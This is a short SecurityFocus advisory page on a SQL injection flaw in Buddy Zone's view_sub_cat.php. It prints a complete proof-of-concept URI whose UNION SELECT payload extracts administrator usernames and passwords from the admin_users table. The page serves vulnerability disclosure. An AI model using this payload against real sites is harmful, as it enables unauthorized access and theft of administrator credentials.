Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Buddy Zone View_Sub_Cat.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*







 

Privacy Statement
Copyright 2009, SecurityFocus